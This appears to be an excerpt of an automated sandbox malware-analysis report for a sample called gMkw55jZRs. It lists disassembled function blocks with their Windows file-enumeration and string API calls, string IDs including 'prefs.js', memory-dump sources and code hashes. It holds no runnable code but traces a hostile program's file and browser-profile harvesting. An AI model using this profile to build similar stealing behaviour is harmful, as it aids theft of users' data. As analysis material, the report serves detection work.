                                      • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                                      APIs
                                      • wsprintfA.USER32 ref: 0041492C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                      • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                      • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                      • FindClose.KERNEL32(000000FF), ref: 00414B92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s$%s\%s$%s\*
                                      • API String ID: 180737720-445461498
                                      • Opcode ID: f64dd78f470d60d5e6684bba1db7ab347a0029ed743c8e05a62c1da31839ea41
                                      • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                      • Opcode Fuzzy Hash: f64dd78f470d60d5e6684bba1db7ab347a0029ed743c8e05a62c1da31839ea41
                                      • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                      APIs
                                      • wsprintfA.USER32 ref: 00923B33
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00923B4A
                                      • lstrcat.KERNEL32(?,?), ref: 00923B9C
                                      • StrCmpCA.SHLWAPI(?,00420F70), ref: 00923BAE
                                      • StrCmpCA.SHLWAPI(?,00420F74), ref: 00923BC4
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00923ECE
                                      • FindClose.KERNEL32(000000FF), ref: 00923EE3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                      • String ID:
                                      • API String ID: 1125553467-0
                                      • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                      • Instruction ID: d4e70e89e4fe95314f5ff9e743565a9315eefa54a95e0df084f5fa2034bff834
                                      • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                      • Instruction Fuzzy Hash: ACA15FB5A40218ABDB34DFA4DC85FEE7379BB89300F048588B60D96185DB759B84CF62
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                      • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                      • wsprintfA.USER32 ref: 004145A6
                                      • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                      • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                      • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                      • FindClose.KERNEL32(000000FF), ref: 004146A0
                                      • lstrcatA.KERNEL32(?,009DC808,?,00000104), ref: 004146C5
                                      • lstrcatA.KERNEL32(?,009DBA40), ref: 004146D8
                                      • lstrlenA.KERNEL32(?), ref: 004146E5
                                      • lstrlenA.KERNEL32(?), ref: 004146F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                      • String ID: %s\%s$%s\*
                                      • API String ID: 13328894-2848263008
                                      • Opcode ID: b19de660a787c585203e961524785ef4f8c7c5ebf2fdcdf8f42e36bc1f4495a2
                                      • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                      • Opcode Fuzzy Hash: b19de660a787c585203e961524785ef4f8c7c5ebf2fdcdf8f42e36bc1f4495a2
                                      • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                      APIs
                                      • wsprintfA.USER32 ref: 00924B93
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00924BAA
                                      • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00924BD8
                                      • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00924BEE
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00924DE4
                                      • FindClose.KERNEL32(000000FF), ref: 00924DF9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID:
                                      • API String ID: 180737720-0
                                      • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                      • Instruction ID: 601181abc568135cee091215b07802c9c38730121a710f52752842a45019ad3b
                                      • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                      • Instruction Fuzzy Hash: 4B6188B6940218BBCB20EBE0ED45FEA73BDFB49700F04458CB60992145EB75AB85CF91
                                      APIs
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                        • Part of subcall function 0092AB87: lstrcpy.KERNEL32(00000000,?), ref: 0092ABD9
                                        • Part of subcall function 0092AB87: lstrcat.KERNEL32(00000000), ref: 0092ABE9
                                        • Part of subcall function 0092AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0092AC2C
                                        • Part of subcall function 0092AC17: lstrcpy.KERNEL32(00000000), ref: 0092AC6B
                                        • Part of subcall function 0092AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0092AC79
                                        • Part of subcall function 0092AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0092AB6C
                                      • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0091C15C
                                      • StrCmpCA.SHLWAPI(?,004213F8), ref: 0091C1B4
                                      • StrCmpCA.SHLWAPI(?,004213FC), ref: 0091C1CA
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0091CA26
                                      • FindClose.KERNEL32(000000FF), ref: 0091CA38
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                      • Instruction ID: 3a3b2607fad49507a0d1a954b78963b2d80a322f36dae2cc6207dab9be532d11
                                      • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                      • Instruction Fuzzy Hash: 27421172A10118EBCF14FBA0ED56FED737AAFD4700F404568B50A96195EE349B88CF92
                                      APIs
                                      • wsprintfA.USER32 ref: 00413EC3
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                      • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                      • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                      • FindClose.KERNEL32(000000FF), ref: 00414081
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 180737720-4073750446
                                      • Opcode ID: 99b6f57015465be570b51e732a918a206cfe933a16528d1161771a5eb7529697
                                      • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                      • Opcode Fuzzy Hash: 99b6f57015465be570b51e732a918a206cfe933a16528d1161771a5eb7529697
                                      • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 009247E7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 009247EE
                                      • wsprintfA.USER32 ref: 0092480D
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00924824
                                      • StrCmpCA.SHLWAPI(?,00420FC4), ref: 00924852
                                      • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00924868
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 009248F2
                                      • FindClose.KERNEL32(000000FF), ref: 00924907
                                      • lstrcat.KERNEL32(?,0064A524), ref: 0092492C
                                      • lstrcat.KERNEL32(?,0064A22C), ref: 0092493F
                                      • lstrlen.KERNEL32(?), ref: 0092494C
                                      • lstrlen.KERNEL32(?), ref: 0092495D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                      • String ID:
                                      • API String ID: 671575355-0
                                      • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                      • Instruction ID: 331e979398eed079d34d73207e07629654085c90adfde77ad7c39cbc5bf64e5c
                                      • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                      • Instruction Fuzzy Hash: F65187B9950218ABCB20EBB0EC89FEE737DEB58700F404588F60992194DB749B84CF91
                                      APIs
                                      • wsprintfA.USER32 ref: 0092412A
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00924141
                                      • StrCmpCA.SHLWAPI(?,00420FAC), ref: 0092416F
                                      • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00924185
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 009242D3
                                      • FindClose.KERNEL32(000000FF), ref: 009242E8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID:
                                      • API String ID: 180737720-0
                                      • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                      • Instruction ID: c208a3a0ab72ceef998119500ae18d283ff31b1e65c5ead53d73beea4bbc7d16
                                      • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                      • Instruction Fuzzy Hash: F95173B6900228BBCB24FBB0ED85FFA737DBB94300F00458CB64996085DB759B858F95
                                      APIs
                                      • wsprintfA.USER32 ref: 0040ED3E
                                      • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                      • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                      • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                      • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\*.*
                                      • API String ID: 180737720-1013718255
                                      • Opcode ID: 7c62be60ea4ce17a6daee6ca2e1ad8d80329f85963da6490b9882dd3eef46d84
                                      • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                      • Opcode Fuzzy Hash: 7c62be60ea4ce17a6daee6ca2e1ad8d80329f85963da6490b9882dd3eef46d84
                                      • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                      • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                      • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                      • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                      • String ID: 4@$\*.*
                                      • API String ID: 2325840235-1993203227
                                      • Opcode ID: 2fdb38499aad82abd71ff5b0795ef68458680d2d1f732a1e4f71a59c5be8a5c9
                                      • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                      • Opcode Fuzzy Hash: 2fdb38499aad82abd71ff5b0795ef68458680d2d1f732a1e4f71a59c5be8a5c9
                                      • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                      • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                      • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                      • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: prefs.js
                                      • API String ID: 3334442632-3783873740
                                      • Opcode ID: c63fd1c20efeb8716f133c94eea4b1cf0d084daeba1700bb8994144291ed7823
                                      • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                      • Opcode Fuzzy Hash: c63fd1c20efeb8716f133c94eea4b1cf0d084daeba1700bb8994144291ed7823
                                      • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
                                      • StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
                                      • StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                      • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                      • FindClose.KERNEL32(000000FF), ref: 00401E32
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 1415058207-1173974218
                                      • Opcode ID: b05b312c236247dd8bb4291ae9665c13a99689da75fb9ac0a03e7b6d5e9b60d0
                                      • Instruction ID: 47de987318eafb428d6e9afc63df3879dd5ba7490b623eb573f4dfe72a2f4575
                                      • Opcode Fuzzy Hash: b05b312c236247dd8bb4291ae9665c13a99689da75fb9ac0a03e7b6d5e9b60d0
                                      • Instruction Fuzzy Hash: 641260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                      APIs
                                      • wsprintfA.USER32 ref: 0091EFA5
                                      • FindFirstFileA.KERNEL32(?,?), ref: 0091EFBC
                                      • StrCmpCA.SHLWAPI(?,00421538), ref: 0091F012
                                      • StrCmpCA.SHLWAPI(?,0042153C), ref: 0091F028
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0091F515
                                      • FindClose.KERNEL32(000000FF), ref: 0091F52A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID:
                                      • API String ID: 180737720-0
                                      • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                      • Instruction ID: 3c21b0aebd064c110d0ca9ea4e8c7b310956d67edf5daabebb758ab4d6c96a47
                                      • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                      • Instruction Fuzzy Hash: B9E1E072911228DBDB18EB60ED52FEE7339AF94700F4041E9B10A62496EE305FC9CF52
                                      APIs
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                        • Part of subcall function 0092AB87: lstrcpy.KERNEL32(00000000,?), ref: 0092ABD9
                                        • Part of subcall function 0092AB87: lstrcat.KERNEL32(00000000), ref: 0092ABE9
                                        • Part of subcall function 0092AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0092AC2C
                                        • Part of subcall function 0092AC17: lstrcpy.KERNEL32(00000000), ref: 0092AC6B
                                        • Part of subcall function 0092AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0092AC79
                                        • Part of subcall function 0092AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0092AB6C
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0091DD52
                                      • StrCmpCA.SHLWAPI(?,004214B4), ref: 0091DD9A
                                      • StrCmpCA.SHLWAPI(?,004214B8), ref: 0091DDB0
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0091E033
                                      • FindClose.KERNEL32(000000FF), ref: 0091E045
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                      • Instruction ID: 2ebed959918c8351d4754adf8192cf2829ddc2e41d79e18055c7aa3041f605b9
                                      • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                      • Instruction Fuzzy Hash: 79914273A00218EBCB14FFB0ED56BED7379AFD5300F004668B54A96185EE349B58CB92
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                      • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                      • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                      • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: 3e4cb658669e0da854d1c83ae07f47800a235198039fbdbe3b22788fe6e17176
                                      • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                      • Opcode Fuzzy Hash: 3e4cb658669e0da854d1c83ae07f47800a235198039fbdbe3b22788fe6e17176
                                      • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                      APIs
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                        • Part of subcall function 0092AB87: lstrcpy.KERNEL32(00000000,?), ref: 0092ABD9
                                        • Part of subcall function 0092AB87: lstrcat.KERNEL32(00000000), ref: 0092ABE9
                                        • Part of subcall function 0092AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0092AC2C
                                        • Part of subcall function 0092AC17: lstrcpy.KERNEL32(00000000), ref: 0092AC6B
                                        • Part of subcall function 0092AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0092AC79
